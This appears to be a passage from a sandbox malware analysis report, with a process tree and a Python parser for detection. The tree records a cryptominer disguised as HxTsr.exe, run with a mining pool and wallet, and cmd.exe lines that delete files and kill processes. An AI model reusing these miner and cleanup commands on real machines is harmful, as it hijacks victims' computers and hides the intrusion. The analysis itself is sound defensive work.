    cmdline: "cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\PING.EXE  (PID 2164)
      cmdline: ping -n 2 127.0.0.1
      - Runs ping.exe

  C:\Windows\system32\cmd.exe  (PID 3964)
    cmdline: "cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\WMIC.exe  (PID 3032)
      cmdline: wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete

  C:\Windows\system32\cmd.exe  (PID 4040)
    cmdline: "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\PING.EXE  (PID 1460)
      cmdline: ping -n 10 127.0.0.1
      - Runs ping.exe

  C:\Windows\system32\cmd.exe  (PID 2360)
    cmdline: "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\Wbem\WMIC.exe  (PID 1656)
      cmdline: wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
      - Kills process with WMI
      - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe  (PID 400)
    cmdline: "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of FindShellTrayWindow

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe  (PID 3452)
  cmdline: C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cleanmgr.exe  (PID 208)
    cmdline: "C:\Windows\System32\cleanmgr.exe" /setup
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe  (PID 3708)
      cmdline: C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe {F243B500-D086-4018-A5D7-26A3B538A770}
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in Windows directory
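The HxTsr.exe command line in the tree is a miner invocation: the options match XMRig's documented flags (-o pool URL, -u user/wallet, -p password, -k keepalive, -t threads, --tls, plus the CPU-backend switches --cpu-no-yield and --randomx-cache-qos). The parser below is an added example, not code from the report or from the XMRig project; it tokenises the command line, extracts pool, wallet and thread count, checks that the -u value has the shape of a Monero address (base58, 95 or 106 characters, leading 4 or 8), and lists the indicators a detection rule would combine. The option tables and the indicator names are the author's assumptions about XMRig's flag names, not its own parser; the sample command line is the one recorded above.

```python
"""Parse the miner command line recorded for HxTsr.exe in this report.

Added example, not part of the sandbox report or of the XMRig project. It
tokenises a Windows command line, maps the options XMRig documents (-o/--url,
-u/--user, -p/--pass, -t/--threads, -k/--keepalive, --tls, ...) into a dict,
validates that the user field has the shape of a Monero address, and lists the
indicators a detection rule would key on. The option tables are assumptions
about the flag names, not the project's own parser.
"""
import ntpath
import re

VALUE_OPTS = {"-o": "url", "--url": "url", "-u": "user", "--user": "user",
              "-p": "pass", "--pass": "pass", "-t": "threads", "--threads": "threads",
              "-a": "algo", "--algo": "algo", "--coin": "coin"}
FLAG_OPTS = {"-k": "keepalive", "--keepalive": "keepalive", "--tls": "tls",
             "-B": "background", "--background": "background",
             "--cpu-no-yield": "cpu_no_yield", "--randomx-cache-qos": "randomx_cache_qos"}
# CPU-backend switches that exist only in XMRig's option set (assumption).
XMRIG_SPECIFIC = {"--cpu-no-yield", "--randomx-cache-qos"}
# Bitcoin-style base58 alphabet, also used by Monero (no 0, O, I, l).
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def looks_like_monero_address(s: str) -> bool:
    """Standard/sub-addresses are 95 chars starting with 4 or 8; integrated are 106."""
    return len(s) in (95, 106) and s[:1] in ("4", "8") and set(s) <= BASE58


def tokenize(cmdline: str) -> list:
    """Split on whitespace, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_miner_cmdline(cmdline: str) -> dict:
    tokens = tokenize(cmdline)
    opts, flags, unparsed = {}, [], []
    i = 1                                      # tokens[0] is the image path
    while i < len(tokens):
        key, _, inline_val = tokens[i].partition("=")
        if key in VALUE_OPTS:
            if inline_val == "" and i + 1 < len(tokens):
                inline_val = tokens[i + 1]     # value given as a separate token
                i += 1
            opts[VALUE_OPTS[key]] = inline_val
        elif key in FLAG_OPTS:
            opts[FLAG_OPTS[key]] = True
            if key in XMRIG_SPECIFIC:
                flags.append(key)
        else:
            unparsed.append(tokens[i])         # e.g. -v=0, kept for the analyst
        i += 1
    url = opts.get("url", "")
    hostport = url.split("://", 1)[-1]         # drop stratum+tcp:// etc. if present
    host, _, port = hostport.rpartition(":")
    if not host:                               # no port given
        host, port = hostport, ""
    threads = opts.get("threads", "")
    return {
        "image": tokens[0],
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": opts.get("user", ""),
        "password": opts.get("pass", ""),
        "threads": int(threads) if threads.isdigit() else None,
        "tls": bool(opts.get("tls")),
        "keepalive": bool(opts.get("keepalive")),
        "xmrig_flags": flags,
        "unparsed": unparsed,
    }


def miner_indicators(p: dict) -> list:
    """Indicators a rule would combine; each is weak alone, strong together."""
    ind = []
    if p["pool_host"] and p["pool_port"]:
        ind.append("pool_endpoint")
    if looks_like_monero_address(p["wallet"]):
        ind.append("monero_address_as_user")
    if p["xmrig_flags"]:
        ind.append("xmrig_specific_flag")
    if p["image"].lower().startswith("c:\\users\\"):
        ind.append("image_under_user_profile")
    if ntpath.basename(p["image"]).lower() == "hxtsr.exe":
        # the genuine Mail/Calendar sync host is never started with pool options
        ind.append("mail_sync_host_name")
    return ind


# The HxTsr.exe command line from this report's process tree.
SAMPLE_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy'
    r'\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe"'
    " -o gulf.moneroocean.stream:20128"
    " -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL"
    " -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1"
)

if __name__ == "__main__":
    parsed = parse_miner_cmdline(SAMPLE_CMDLINE)
    print(parsed)
    print(miner_indicators(parsed))
```

The address check is structural only (length, leading digit, alphabet); it does not validate the embedded checksum, which is enough for triage because the goal is to recognise a wallet-shaped -u argument, not to verify it. -t 1 and --cpu-no-yield together are worth noting in a hunt: a single-threaded, low-priority miner is tuned to stay under CPU-usage alerts rather than to maximise hash rate.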